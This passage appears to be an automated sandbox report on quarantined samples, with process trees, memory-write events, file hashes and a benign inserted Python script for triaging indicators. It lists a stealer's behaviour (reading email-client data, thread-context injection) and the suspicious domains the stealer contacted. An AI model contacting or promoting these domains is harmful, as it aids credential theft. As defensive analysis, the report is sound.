N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5092 wrote to memory of 888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffd7fdc46f8,0x7ffd7fdc4708,0x7ffd7fdc4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4912 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

\??\pipe\LOCAL\crashpad_5092_WVNZWYKNJEBNBCPS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6c79e94ad2036a8b2e71d7a8d740bc06
SHA1 b7d288dd22eb2ba1d381cbb3bbb331dab197182b
SHA256 2d1d4f8de6b9af94455631ce907243355ed02307a63ce48c8ea95e0e250a49b7
SHA512 84a183f444254157749e4130e4f31fc31c594aa183eb3fa7dfcfeda1f7d9729cd3b88ff6d4a4ac2de1e95d727d1ef823439f803b2f417be55cab6bfcbfd1fef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 67e28e2fdb5e4e1e2ec96e9a46344d3f
SHA1 61b72929feab739db69af1205998ae1986381039
SHA256 d4fd5719d33de7086b562390e03e89d5543122b442d73cf2d9f39e16f55e156b
SHA512 0e60eddc670d849f46e3bb60a104615a8f95c0a0c9983f6e9875c4fd5953d4102ffc98480b527042b7b64a3eb629699a924b8f674207ff80620109d3f678d90b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2713cf4e2633aa1d32a7f0d49372a125
SHA1 a14634b7251cdfea9ea04cf2940d392c5b6e9732
SHA256 1406e72f31141b5892389fc4a68699afbc45e95b932fbbee51c3da8e3ff7808d
SHA512 54e39811b350429d13c789b2ee153b025d462c28fd23352317e0d9c42893cd5f17feb90acef580e6388b7df8b734c0e6d9239716e38fee958cdfe94237717f82
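
A check worth running before lifting the digests above into an IOC list, added here as an example and not part of the sandbox report: the named-pipe entry carries the MD5/SHA1/SHA256/SHA512 of zero bytes (MD5 d41d8cd98f00b204e9800998ecf8427e and its companions), meaning the sandbox hashed no content for it, and settings.dat and Preferences each appear twice with different digests because they were rewritten during the run. The script parses five records copied from the listing, rejects malformed digests, drops empty-content records, and reports paths whose content changed. The record shape (path line, blank line, four digest lines) is assumed to be exactly what the sandbox prints.

```python
import hashlib
from collections import defaultdict

# Five records copied from the Files listing of this report: a path line, a blank line,
# then one line per digest, exactly as the sandbox prints them. That shape is assumed.
FILES_LISTING = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

\??\pipe\LOCAL\crashpad_5092_WVNZWYKNJEBNBCPS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6c79e94ad2036a8b2e71d7a8d740bc06
SHA1 b7d288dd22eb2ba1d381cbb3bbb331dab197182b
SHA256 2d1d4f8de6b9af94455631ce907243355ed02307a63ce48c8ea95e0e250a49b7
SHA512 84a183f444254157749e4130e4f31fc31c594aa183eb3fa7dfcfeda1f7d9729cd3b88ff6d4a4ac2de1e95d727d1ef823439f803b2f417be55cab6bfcbfd1fef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2713cf4e2633aa1d32a7f0d49372a125
SHA1 a14634b7251cdfea9ea04cf2940d392c5b6e9732
SHA256 1406e72f31141b5892389fc4a68699afbc45e95b932fbbee51c3da8e3ff7808d
SHA512 54e39811b350429d13c789b2ee153b025d462c28fd23352317e0d9c42893cd5f17feb90acef580e6388b7df8b734c0e6d9239716e38fee958cdfe94237717f82
"""

ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Digests of zero bytes, computed rather than trusted from memory: a record that carries
# all four means the sandbox hashed no content (named pipes, zero-length files).
EMPTY_DIGESTS = {a: hashlib.new(a.lower(), b"").hexdigest() for a in ALGOS}


def parse_files_listing(text):
    """Group the listing into {'path', 'MD5', 'SHA1', 'SHA256', 'SHA512'} dicts, validating each digest."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        algo, _, value = line.partition(" ")
        if algo in ALGOS and current is not None:
            if len(value) != HEX_LEN[algo] or set(value) - set("0123456789abcdef"):
                raise ValueError(f"malformed {algo} for {current['path']}: {value}")
            current[algo] = value
        else:                              # anything else starts a new record (the path)
            current = {"path": line}
            records.append(current)
    incomplete = [r["path"] for r in records if any(a not in r for a in ALGOS)]
    if incomplete:
        raise ValueError(f"records missing a digest line: {incomplete}")
    return records


def is_empty_content(record):
    """True when every digest equals the digest of zero bytes."""
    return all(record[a] == EMPTY_DIGESTS[a] for a in ALGOS)


def triage(records):
    """Usable SHA256 IOCs, paths captured with no content, and paths rewritten during the run."""
    by_path, empty, hashes = defaultdict(set), [], set()
    for r in records:
        if is_empty_content(r):
            empty.append(r["path"])
            continue
        by_path[r["path"]].add(r["SHA256"])
        hashes.add(r["SHA256"])
    modified = sorted(p for p, digests in by_path.items() if len(digests) > 1)
    return {"empty": empty, "modified": modified, "sha256": sorted(hashes)}


if __name__ == "__main__":
    for key, values in triage(parse_files_listing(FILES_LISTING)).items():
        print(key)
        for v in values:
            print("   ", v)
```

The "modified" list is the useful part for a detection engineer: a file that changes during the run belongs in a behavioural rule on the path, not in a hash blocklist, because its digest will differ on every host.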

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

N/A

Files

memory/2528-0-0x000000013F7D0000-0x000000013F97E000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4500 set thread context of 4876 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 776

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.112.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
